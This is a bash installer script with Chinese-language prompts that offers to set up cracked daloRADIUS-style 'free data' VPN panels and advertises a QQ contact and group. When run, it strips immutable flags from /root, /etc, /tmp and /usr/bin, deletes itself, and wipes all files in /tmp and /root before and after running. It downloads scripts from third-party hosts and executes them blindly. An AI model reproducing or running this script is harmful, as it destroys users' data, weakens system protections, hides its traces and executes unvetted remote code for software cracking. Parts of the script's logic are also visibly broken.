#!/bin/bash
ulimit -c 0 >/dev/null 2>&1
chattr -i /root >/dev/null 2>&1
chattr -i /tmp >/dev/null 2>&1
chattr -i /etc >/dev/null 2>&1
chattr -i /usr/bin >/dev/null 2>&1
rm -rf $0 >/dev/null 2>&1
rm -rf xbcpj >/dev/null 2>&1
rm -f /tmp/* >/dev/null 2>&1
rm -f /root/* >/dev/null 2>&1
# ********************************** 脚本开始 **************************** #
IP=`wget http://www.sbwml.cn/getip -O - -q ; echo`;
# LOGO ********************************************************************
# 广告通知 ****************************************************************
echo
echo "正在检测您的IP是否正确加载..."

	if [[ "$IP" == '' ]]; then
		echo '无法检测您的IP,可能会影响到您接下来的搭建工作';
		read -p '请输入您的公网IP:' IP;
		[[ "$IP" == '' ]] && InputIPAddress;
	fi;
	[[ "$IP" == '' ]] && 
						 echo -e 'IP状态：			  [\033[32m  OK  \033[0m]'
						 echo -e "您的IP是：\033[34m$IP \033[0m"
						 echo 
						 echo
	if [ mod=1 ]
	then
echo -e "\033[33m========================================================================= \033[0m"
echo -e "\033[36m                     不知年少轻狂、只知胜者为王 \033[0m"
echo -e "\033[36m                       官网网站：xbml.vip \033[0m"
echo -e "\033[36m                       小白QQ：1475129762 \033[0m"
echo -e "\033[36m                       免流交流群:173504018\033[0m"
echo
echo
echo -e "\033[0;1;35m                  1.博雅dalo破解脚本               【6.x系统】     \033[0m"                
echo  
echo -e "\033[0;1;35m                  2.YG-DALO破解脚本                【6.x系统】              \033[0m"
echo                                                                                                                  
echo -e "\033[36m                                                by 小白免流       \033[0m"
echo -e "\033[33m========================================================================== \033[0m"
echo
echo
echo -n "输入您要搭建的选项: " 
read mode
fi
if [[ $mode == "1" ]]     
then
echo -e "安装类型：\033[36m博雅dalo破解脚本\033[0m" ;  
wget http://tx.xbaicai.net/by >/dev/null 2>&1
bash by
fi

if [[ $mode == "2" ]]     
then
echo -e "安装类型：\033[36mYG-DALO破解脚本\033[0m" ;  
wget http://xbmlpj.nos-eastchina1.126.net/yg >/dev/null 2>&1
bash yg
fi

rm -f /tmp/* >/dev/null 2>&1
rm -f /root/* >/dev/null 2>&1
exit 0